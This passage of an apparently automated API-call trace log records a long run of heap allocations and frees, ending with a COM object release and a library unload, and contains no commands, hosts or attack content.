RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x100) returned 0xcf3940 [0270.290] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf34b8 | out: hHeap=0xcc0000) returned 1 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3690 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6610 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf36a8 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6638 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3130 [0270.290] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce6610 | out: hHeap=0xcc0000) returned 1 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf36c0 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf36d8 [0270.290] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36a8 | out: hHeap=0xcc0000) returned 1 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf36a8 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2) returned 0xcf3140 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf36f0 [0270.290] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3708 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3150 [0270.291] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3140 | out: hHeap=0xcc0000) returned 1 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3720 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3738 [0270.291] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36f0 | out: hHeap=0xcc0000) returned 1 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf36f0 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1c) returned 0xce6610 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3750 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6660 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3140 [0270.291] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce6610 | out: hHeap=0xcc0000) returned 1 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3768 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3780 [0270.291] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3750 | out: hHeap=0xcc0000) returned 1 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3750 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3798 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37b0 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37c8 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37e0 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xac) returned 0xcf3a48 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37f8 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3810 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3828 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3840 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3858 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3870 [0270.291] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3888 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf38a0 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf38b8 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf38d0 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf38e8 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3900 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3918 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3b18 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3b30 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3b48 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3b60 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3b78 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3b90 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3ba8 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3bc0 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3bd8 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3bf0 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3c08 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3c20 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3c38 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3c50 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3c68 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3c80 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3c98 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3cb0 [0270.292] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3cc8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3ce0 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3cf8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3d10 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3d28 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3d40 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3d58 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3d70 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3d88 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3da0 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3db8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3dd0 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3de8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3e00 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3e18 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3e30 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3e48 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3e60 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3e78 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3e90 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3ea8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3ec0 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3ed8 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3f18 [0270.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3f30 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea6f0 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea7b0 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea798 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea780 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea810 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea7c8 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea7e0 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea870 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea828 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea840 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea8d0 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea8b8 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea888 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea918 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea900 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea8e8 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea930 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea948 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea9a8 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea960 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea978 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea9c0 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea9d8 | out: hHeap=0xcc0000) returned 1 [0270.294] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa38 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea9f0 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa08 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa50 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa68 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3558 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa80 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xceaa98 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3570 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3588 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35d0 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35b8 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35a0 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35e8 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3600 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3660 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3618 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3630 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3678 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3690 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36d8 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36c0 | out: hHeap=0xcc0000) returned 1 [0270.295] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36a8 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3738 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3720 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf36f0 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3780 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3768 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3750 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3798 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37b0 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37c8 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37e0 | out: hHeap=0xcc0000) returned 1 [0270.296] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37e0 [0270.296] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf37c8 [0270.296] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3160 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37c8 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3160 | out: hHeap=0xcc0000) returned 1 [0270.296] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37e0 | out: hHeap=0xcc0000) returned 1 [0270.296] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37e0 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x14) returned 0xcea628 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf37c8 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6610 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3160 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea628 | out: hHeap=0xcc0000) returned 1 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37b0 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3798 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37c8 | out: hHeap=0xcc0000) returned 1 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37c8 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6688 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3750 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3768 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3780 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf36f0 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37e0 | out: hHeap=0xcc0000) returned 1 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3798 | out: hHeap=0xcc0000) returned 1 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37b0 | out: hHeap=0xcc0000) returned 1 [0270.297] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37c8 | out: hHeap=0xcc0000) returned 1 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x6) returned 0xcf3170 [0270.297] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf37c8 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3180 [0270.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37c8 | out: hHeap=0xcc0000) returned 1 [0270.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3170 | out: hHeap=0xcc0000) returned 1 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37c8 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37b0 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3798 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf37e0 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3170 [0270.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf37b0 | out: hHeap=0xcc0000) returned 1 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf37b0 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3720 [0270.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3798 | out: hHeap=0xcc0000) returned 1 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3798 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3180 [0270.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3738 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf36a8 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3190 [0270.319] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf36c0 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf36d8 [0270.319] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3738 | out: hHeap=0xcc0000) returned 1 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xa) returned 0xcf3738 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3690 [0270.319] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3180 [0270.319] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3690 | out: hHeap=0xcc0000) returned 1 [0270.319] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3738 | out: hHeap=0xcc0000) returned 1 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3738 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xe) returned 0xcf3690 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3678 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3180 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3678 | out: hHeap=0xcc0000) returned 1 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3690 | out: hHeap=0xcc0000) returned 1 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3690 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x12) returned 0xcea628 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce66b0 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf3180 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce66b0 | out: hHeap=0xcc0000) returned 1 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea628 | out: hHeap=0xcc0000) returned 1 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3678 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3630 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3618 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3660 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3600 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35e8 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2) returned 0xcf3180 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf35a0 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf35b8 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcf31a0 [0270.320] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf3180 | out: hHeap=0xcc0000) returned 1 [0270.320] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35d0 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3588 [0270.321] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcf35a0 | out: hHeap=0xcc0000) returned 1 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf35a0 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3570 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x3c) returned 0xcd22d0 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3558 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3f48 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3f60 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3f78 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3f90 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcf3fa8 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3fc0 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3fd8 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf3ff0 [0270.321] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcf4008 [0270.334] IUnknown:Release (This=0xce6520) returned 0x0 [0270.334] FreeLibrary (hLibModule=0x290000) returned 1 [0270.334] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9250 | out: hHeap=0xcc0000) returned 1 [0270.334] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9238 | out: hHeap=0xcc0000) returned 1 [0270.334] 